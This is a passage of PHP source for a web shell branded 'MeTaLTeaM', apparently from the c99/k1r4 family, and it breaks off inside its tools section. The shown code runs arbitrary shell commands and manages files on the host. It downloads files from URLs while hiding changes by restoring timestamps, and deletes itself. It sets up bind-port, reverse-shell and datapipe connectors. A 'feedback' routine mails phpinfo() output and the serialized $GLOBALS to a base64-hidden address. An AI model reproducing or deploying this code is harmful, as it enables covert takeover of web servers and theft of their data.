1584 if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
1585 else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
1586 echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
1587 }
1588 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
1589 $c = strlen($encoder_input);
1590 for($i=0;$i<$c;$i++)
1591 {
1592 $hex = dechex(ord($encoder_input[$i]));
1593 if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
1594 elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
1595 }
1596 echo "\" readonly><br></center></form>";
1597}
1598if ($act == "fsbuff")
1599{
1600 $arr_copy = $sess_data["copy"];
1601 $arr_cut = $sess_data["cut"];
1602 $arr = array_merge($arr_copy,$arr_cut);
1603 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
1604 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
1605}
1606if ($act == "selfremove")
1607{
1608 if (($submit == $rndcode) and ($submit != ""))
1609 {
1610 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using MeTaLTeaM".$shver."!"; k1r4exit(); }
1611 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
1612 }
1613 else
1614 {
1615 if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
1616 $rnd = rand(0,9).rand(0,9).rand(0,9);
1617 echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
1618 }
1619}
1620if ($act == "update") {$ret = k1r4_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
1621if ($act == "feedback")
1622{
1623 $suppmail = base64_decode("ZnJlZXNoZWxsNTEwQGdtYWlsLmNvbQ==");
1624 if (!empty($submit))
1625 {
1626 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1627 $body = "MeTaLTeaM".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1628 if (!empty($fdbk_ref))
1629 {
1630 $tmp = @ob_get_contents();
1631 ob_clean();
1632 phpinfo();
1633 $phpinfo = base64_encode(ob_get_contents());
1634 ob_clean();
1635 echo $tmp;
1636 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1637 }
1638 mail($suppmail,"MeTaLTeaM".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
1639 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
1640 }
1641 else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
1642}
1643if ($act == "search")
1644{
1645 echo "<b>Search in file-system:</b><br>";
1646 if (empty($search_in)) {$search_in = $d;}
1647 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1648 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1649 if (!empty($submit))
1650 {
1651 $found = array();
1652 $found_d = 0;
1653 $found_f = 0;
1654 $search_i_f = 0;
1655 $search_i_d = 0;
1656 $a = array
1657 (
1658 "name"=>$search_name, "name_regexp"=>$search_name_regexp,
1659 "text"=>$search_text, "text_regexp"=>$search_text_regxp,
1660 "text_wwo"=>$search_text_wwo,
1661 "text_cs"=>$search_text_cs,
1662 "text_not"=>$search_text_not
1663 );
1664 $searchtime = getmicrotime();
1665 $in = array_unique(explode(";",$search_in));
1666 foreach($in as $v) {k1r4fsearch($v);}
1667 $searchtime = round(getmicrotime()-$searchtime,4);
1668 if (count($found) == 0) {echo "<b>No files found!</b>";}
1669 else
1670 {
1671 $ls_arr = $found;
1672 $disp_fullpath = TRUE;
1673 $act = "ls";
1674 }
1675 }
1676 echo "<form method=POST>
1677<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
1678<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
1679<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
1680<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
1681<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
1682&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
1683&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
1684&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
1685<br><br><input type=submit name=submit value=\"Search\"></form>";
1686 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
1687}
1688if ($act == "chmod")
1689{
1690 $mode = fileperms($d.$f);
1691 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
1692 else
1693 {
1694 $form = TRUE;
1695 if ($chmod_submit)
1696 {
1697 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
1698 if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
1699 else {$err = "Can't chmod to ".$octet.".";}
1700 }
1701 if ($form)
1702 {
1703 $perms = parse_perms($mode);
1704 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
1705 }
1706 }
1707}
1708if ($act == "upload")
1709{
1710 $uploadmess = "";
1711 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
1712 if (empty($uploadpath)) {$uploadpath = $d;}
1713 elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
1714 if (!empty($submit))
1715 {
1716 global $HTTP_POST_FILES;
1717 $uploadfile = $HTTP_POST_FILES["uploadfile"];
1718 if (!empty($uploadfile["tmp_name"]))
1719 {
1720 if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
1721 else {$destin = $userfilename;}
1722 if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
1723 }
1724 elseif (!empty($uploadurl))
1725 {
1726 if (!empty($uploadfilename)) {$destin = $uploadfilename;}
1727 else
1728 {
1729 $destin = explode("/",$destin);
1730 $destin = $destin[count($destin)-1];
1731 if (empty($destin))
1732 {
1733 $i = 0;
1734 $b = "";
1735 while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
1736 }
1737 if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
1738 else
1739 {
1740 $st = getmicrotime();
1741 $content = @file_get_contents($uploadurl);
1742 $dt = round(getmicrotime()-$st,4);
1743 if (!$content) {$uploadmess .= "Can't download file!<br>";}
1744 else
1745 {
1746 if ($filestealth) {$stat = stat($uploadpath.$destin);}
1747 $fp = fopen($uploadpath.$destin,"w");
1748 if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
1749 else
1750 {
1751 fwrite($fp,$content,strlen($content));
1752 fclose($fp);
1753 if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
1754 }
1755 }
1756 }
1757 }
1758 }
1759 if ($miniform)
1760 {
1761 echo "<b>".$uploadmess."</b>";
1762 $act = "ls";
1763 }
1764 else
1765 {
1766 echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
1767Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
1768Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
1769Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
1770File-name (auto-fill): <input name=uploadfilename size=25><br><br>
1771<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
1772<input type=submit name=submit value=\"Upload\">
1773</form>";
1774 }
1775}
1776if ($act == "delete")
1777{
1778 $delerr = "";
1779 foreach ($actbox as $v)
1780 {
1781 $result = FALSE;
1782 $result = fs_rmobj($v);
1783 if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
1784 }
1785 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
1786 $act = "ls";
1787}
1788if (!$usefsbuff)
1789{
1790 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
1791}
1792else
1793{
1794 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); k1r4_sess_put($sess_data); $act = "ls"; }
1795 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); k1r4_sess_put($sess_data); $act = "ls";}
1796 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} k1r4_sess_put($sess_data); $act = "ls";}
1797 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); k1r4_sess_put($sess_data);}
1798 elseif ($actpastebuff)
1799 {
1800 $psterr = "";
1801 foreach($sess_data["copy"] as $k=>$v)
1802 {
1803 $to = $d.basename($v);
1804 if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1805 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1806 }
1807 foreach($sess_data["cut"] as $k=>$v)
1808 {
1809 $to = $d.basename($v);
1810 if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1811 unset($sess_data["cut"][$k]);
1812 }
1813 k1r4_sess_put($sess_data);
1814 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1815 $act = "ls";
1816 }
1817 elseif ($actarcbuff)
1818 {
1819 $arcerr = "";
1820 if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
1821 else {$ext = ".tar.gz";}
1822 if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
1823 $cmdline .= " ".$actarcbuff_path;
1824 $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1825 foreach($objects as $v)
1826 {
1827 $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
1828 if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
1829 if (is_dir($v))
1830 {
1831 if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
1832 $v .= "*";
1833 }
1834 $cmdline .= " ".$v;
1835 }
1836 $tmp = realpath(".");
1837 chdir($d);
1838 $ret = myshellexec($cmdline);
1839 chdir($tmp);
1840 if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
1841 $ret = str_replace("\r\n","\n",$ret);
1842 $ret = explode("\n",$ret);
1843 if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
1844 foreach($sess_data["cut"] as $k=>$v)
1845 {
1846 if (in_array($v,$ret)) {fs_rmobj($v);}
1847 unset($sess_data["cut"][$k]);
1848 }
1849 k1r4_sess_put($sess_data);
1850 if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
1851 $act = "ls";
1852 }
1853 elseif ($actpastebuff)
1854 {
1855 $psterr = "";
1856 foreach($sess_data["copy"] as $k=>$v)
1857 {
1858 $to = $d.basename($v);
1859 if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1860 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1861 }
1862 foreach($sess_data["cut"] as $k=>$v)
1863 {
1864 $to = $d.basename($v);
1865 if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1866 unset($sess_data["cut"][$k]);
1867 }
1868 k1r4_sess_put($sess_data);
1869 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1870 $act = "ls";
1871 }
1872}
1873if ($act == "cmd")
1874{
1875if (trim($cmd) == "ps -aux") {$act = "processes";}
1876elseif (trim($cmd) == "tasklist") {$act = "processes";}
1877else
1878{
1879 @chdir($chdir);
1880 if (!empty($submit))
1881 {
1882 echo "<b>Result of execution this command</b>:<br>";
1883 $olddir = realpath(".");
1884 @chdir($d);
1885 $ret = myshellexec($cmd);
1886 $ret = convert_cyr_string($ret,"d","w");
1887 if ($cmd_txt)
1888 {
1889 $rows = count(explode("\r\n",$ret))+1;
1890 if ($rows < 10) {$rows = 10;}
1891 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
1892 }
1893 else {echo $ret."<br>";}
1894 @chdir($olddir);
1895 }
1896 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
1897 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
1898}
1899}
1900if ($act == "ls")
1901{
1902 if (count($ls_arr) > 0) {$list = $ls_arr;}
1903 else
1904 {
1905 $list = array();
1906 if ($h = @opendir($d))
1907 {
1908 while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
1909 closedir($h);
1910 }
1911 else {}
1912 }
1913 if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
1914 else
1915 {
1916 //Building array
1917 $objects = array();
1918 $vd = "f"; //Viewing mode
1919 if ($vd == "f")
1920 {
1921 $objects["head"] = array();
1922 $objects["folders"] = array();
1923 $objects["links"] = array();
1924 $objects["files"] = array();
1925 foreach ($list as $v)
1926 {
1927 $o = basename($v);
1928 $row = array();
1929 if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
1930 elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
1931 elseif (is_dir($v))
1932 {
1933 if (is_link($v)) {$type = "LINK";}
1934 else {$type = "DIR";}
1935 $row[] = $v;
1936 $row[] = $type;
1937 }
1938 elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
1939 $row[] = filemtime($v);
1940 if (!$win)
1941 {
1942 $ow = posix_getpwuid(fileowner($v));
1943 $gr = posix_getgrgid(filegroup($v));
1944 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
1945 }
1946 $row[] = fileperms($v);
1947 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
1948 elseif (is_link($v)) {$objects["links"][] = $row;}
1949 elseif (is_dir($v)) {$objects["folders"][] = $row;}
1950 elseif (is_file($v)) {$objects["files"][] = $row;}
1951 $i++;
1952 }
1953 $row = array();
1954 $row[] = "<b>Name</b>";
1955 $row[] = "<b>Size</b>";
1956 $row[] = "<b>Modify</b>";
1957 if (!$win)
1958 {$row[] = "<b>Owner/Group</b>";}
1959 $row[] = "<b>Perms</b>";
1960 $row[] = "<b>Action</b>";
1961 $parsesort = parsesort($sort);
1962 $sort = $parsesort[0].$parsesort[1];
1963 $k = $parsesort[0];
1964 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
1965 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
1966 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
1967 $row[$k] .= $y;
1968 for($i=0;$i<count($row)-1;$i++)
1969 {
1970 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
1971 }
1972 $v = $parsesort[0];
1973 usort($objects["folders"], "tabsort");
1974 usort($objects["links"], "tabsort");
1975 usort($objects["files"], "tabsort");
1976 if ($parsesort[1] == "d")
1977 {
1978 $objects["folders"] = array_reverse($objects["folders"]);
1979 $objects["files"] = array_reverse($objects["files"]);
1980 }
1981 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
1982 $tab = array();
1983 $tab["cols"] = array($row);
1984 $tab["head"] = array();
1985 $tab["folders"] = array();
1986 $tab["links"] = array();
1987 $tab["files"] = array();
1988 $i = 0;
1989 foreach ($objects as $a)
1990 {
1991 $v = $a[0];
1992 $o = basename($v);
1993 $dir = dirname($v);
1994 if ($disp_fullpath) {$disppath = $v;}
1995 else {$disppath = $o;}
1996 $disppath = str2mini($disppath,60);
1997 if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
1998 elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
1999 foreach ($regxp_highlight as $r)
2000 {
2001 if (ereg($r[0],$o))
2002 {
2003 if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; k1r4exit();}
2004 else
2005 {
2006 $r[1] = round($r[1]);
2007 $isdir = is_dir($v);
2008 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
2009 {
2010 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
2011 $disppath = $r[2].$disppath.$r[3];
2012 if ($r[4]) {break;}
2013 }
2014 }
2015 }
2016 }
2017 $uo = urlencode($o);
2018 $ud = urlencode($dir);
2019 $uv = urlencode($v);
2020 $row = array();
2021 if ($o == ".")
2022 {
2023 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
2024 $row[] = "LINK";
2025 }
2026 elseif ($o == "..")
2027 {
2028 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
2029 $row[] = "LINK";
2030 }
2031 elseif (is_dir($v))
2032 {
2033 if (is_link($v))
2034 {
2035 $disppath .= " => ".readlink($v);
2036 $type = "LINK";
2037 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
2038 }
2039 else
2040 {
2041 $type = "DIR";
2042 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
2043 }
2044 $row[] = $type;
2045 }
2046 elseif(is_file($v))
2047 {
2048 $ext = explode(".",$o);
2049 $c = count($ext)-1;
2050 $ext = $ext[$c];
2051 $ext = strtolower($ext);
2052 $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
2053 $row[] = view_size($a[1]);
2054 }
2055 $row[] = date("d.m.Y H:i:s",$a[2]);
2056 if (!$win) {$row[] = $a[3];}
2057 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
2058 if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
2059 else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
2060 if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
2061 else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
2062 if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
2063 elseif (is_link($v)) {$tab["links"][] = $row;}
2064 elseif (is_dir($v)) {$tab["folders"][] = $row;}
2065 elseif (is_file($v)) {$tab["files"][] = $row;}
2066 $i++;
2067 }
2068 }
2069 // Compiling table
2070 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
2071 echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
2072 foreach($table as $row)
2073 {
2074 echo "<tr>\r\n";
2075 foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
2076 echo "</tr>\r\n";
2077 }
2078 echo "</table><hr size=\"1\" noshade><p align=\"right\">
2079 <script>
2080 function ls_setcheckboxall(status)
2081 {
2082 var id = 1;
2083 var num = ".(count($table)-2).";
2084 while (id <= num)
2085 {
2086 document.getElementById('actbox'+id).checked = status;
2087 id++;
2088 }
2089 }
2090 function ls_reverse_all()
2091 {
2092 var id = 1;
2093 var num = ".(count($table)-2).";
2094 while (id <= num)
2095 {
2096 document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
2097 id++;
2098 }
2099 }
2100 </script>
2101 <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
2102 <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
2103 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
2104 {
2105 echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
2106 }
2107 echo "<select name=act><option value=\"".$act."\">With selected:</option>";
2108 echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
2109 echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
2110 if ($usefsbuff)
2111 {
2112 echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
2113 echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
2114 echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
2115 }
2116 echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
2117 echo "</form>";
2118 }
2119}
2120if ($act == "tools")
2121{
2122 $bndportsrcs = array(
2123 "k1r4_bindport.pl"=>array("Using PERL","perl %path %port"),
2124 "k1r4_bindport.c"=>array("Using C","%path %port %pass")
2125 );
2126 $bcsrcs = array(
2127 "k1r4_backconn.pl"=>array("Using PERL","perl %path %host %port"),
2128 "k1r4_backconn.c"=>array("Using C","%path %host %port")
2129 );
2130 $dpsrcs = array(
2131 "k1r4_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
2132 "k1r4_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
2133 );
2134 if (!is_array($bind)) {$bind = array();}
2135 if (!is_array($bc)) {$bc = array();}
2136 if (!is_array($datapipe)) {$datapipe = array();}
2137
2138 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
2139 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
2140
2141 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
2142 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
2143
2144 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
2145 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
2146 if (!empty($bindsubmit))
2147 {
2148 echo "<b>Result of binding port:</b><br>";
2149 $v = $bndportsrcs[$bind["src"]];
